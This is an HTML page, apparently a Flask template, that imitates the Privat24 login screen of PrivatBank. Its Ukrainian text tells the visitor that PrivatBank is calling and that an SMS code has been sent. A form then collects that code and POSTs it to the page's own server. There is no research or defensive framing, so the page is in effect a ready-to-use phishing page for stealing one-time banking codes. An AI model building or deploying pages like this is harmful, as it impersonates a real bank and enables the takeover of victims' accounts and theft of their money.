<!DOCTYPE html>
<html lang="en">
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
        <title>Privat24</title>
        <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-gH2yIJqKdNHPEq0n4Mqa/HGKIhSkIHeL5AyhkYV8i59U5AR6csBvApHHNl/vI1Bx" crossorigin="anonymous">
        <style>
            *{box-sizing:border-box}
@import 'https://fonts.googleapis.com/css?family=Open+Sans:400,400i&subset=cyrillic';
body {
  margin: 0;
  background: #0F0F0F;
  display: flex;
  justify-content: center;
  align-items: center;
  height: 100vh;
  font-family: 'Open Sans', sans-serif;
}
.form-wrap {
  width: 900px;
  height: 900px;
  background: #212020;
  border-radius: 20px;
}
.form-wrap *{transition: .1s linear}
.profile {
  position: relative;
  width: 520px;
  left: 22%;
  text-align: center;
  padding: 80px;
  padding-right: 0px;
  color: #FFFFFF;
}
form {
  position: absolute;  
  background: #212020;
  float: left;
  width: calc(120% - 150px);
  padding: 60px;
  border-radius: 1px 25px 25px 1px;
  color: #212020; 

}
.form-wrap:after, form div:after {
  content: "";
  display: table;
  clear: both;
}
form div {
  position: relative;
  margin-bottom: -27px;
  right: 60px;
  position: static;
}
.vvod {
    position: relative;
    top: -50px;
    font-size: 20px;
    font-weight: 15px;
    position: relative;
    margin-top: 15px;
    margin-left: 0%;
    color: #ffffff;
}



h1 {
  font-size: 35px;
  font-weight: 500;
  position: relative;
  margin-top: 40px;
  padding-right: 97px;
}

h2 {
    position: relative;
    top: 11px;
    font-size: 22px;
    font-weight: 100;
    position: relative;
    margin-top: 10px;
    padding-right: 107px;
    color: #767676;
  }

label, span {
  display: block;
  font-size: 24px;
  margin-bottom: 8px;
}
input[type="text"] {
  width: 220px;
  height: 60px;
  background: #703d3d00;
  outline: 10px;
  border-radius: 10px;
  border-color: #00FF0A;
  padding: 9px;
  margin: 6px;
  margin-left: 26%;
  margin-top: -40px;
  text-align: center;
  color: white;
}

.radio label {
  position: relative;
  padding-left: 50px;
  cursor: pointer;
  width: 50%;
  float: left;
  line-height: 40px;
}
.radio input {
  position: absolute;
  opacity: 0;
}
.radio-control {
  position: absolute;
  top: 0;
  left: 0;
  height: 40px;
  width: 40px;
  background: #e00505;
  border-radius: 50%;
  text-align: center;
}
.male:before {
  content: "\f222";
  font-family: FontAwesome;
  font-weight: bold;
}
.female:before {
  content: "\f221";
  font-family: FontAwesome;
  font-weight: bold;
}
.radio label:hover input ~ .radio-control,
.radiol input:focus ~ .radio-control {
  box-shadow: inset 0 0 0 2px rgba(0,0,0,.2);
}
.radio input:checked ~ .radio-control {
  color: red;
}
.buttons {
  
  position: relative;
  top: 50px;
  right: 75px;
  padding: 10px 0;
  border-width: 20;
  display: block;
  width: 180px;
  height: 40px;
  margin: 25px auto 0;
  background: #212020;
  color: #00FF0A;
  border-color: #00FF0A;
  font-size: 14px;
  border-radius: 22px;
  outline: none;
  text-transform: uppercase;
  margin-left: 27%;
  margin-top: 10px;
}
.input-form{
    position: relative;
    display: block;
    margin-left: auto;
    margin-right: auto; 
    top: 10px;
    left: -90px;
    border-radius: 10px;

}
img {
    color: #090f09;
    width: 300px;	height: 270px; /* Размеры */
    background: rgba(78, 78, 78, 0); /* Цвет фона */
    padding: 25px 25px 25px 25px;
    margin-right: 50px;
   }

   
.img-item{
    position: relative;
    display: block;
    margin-left: auto;
    margin-right: auto; 
    top: -40px;
    left: -80px;
    width: 270px;
    height: 270px;
}

   @media (max-width: 600px) {
  body {display: block}
  .form-wrap {margin: 20px auto; max-width: 650px; width:100%}
  .profile, form {float: none; width: 100%}
  h1 {margin-top: auto; padding-bottom: 50px;}
  form {border-radius: 0 0 20px 20px}
}
</style>
       </head>
    <div class="form-wrap">
        <div class="profile">
          <h1>Вхід у Приват24</h1>
          <h2 call-block >Телефонує ПриватБанк</h2>
        <form method="POST">

            <center>
                <img class = "img-item" src="{{ url_for( 'static', filename='zamok.svg', v=1)}}">
            </center>
            <div>  
           
            <div class="vvod" >Вам відправлен cмс код</div>
            <input class = "input-form" type="text" name="code" required placeholder="******">
            </div>
            
                
          <button class = "buttons" type="submit">Перевiрити</button> 
        </form> 
      </div>
     </body>
</html>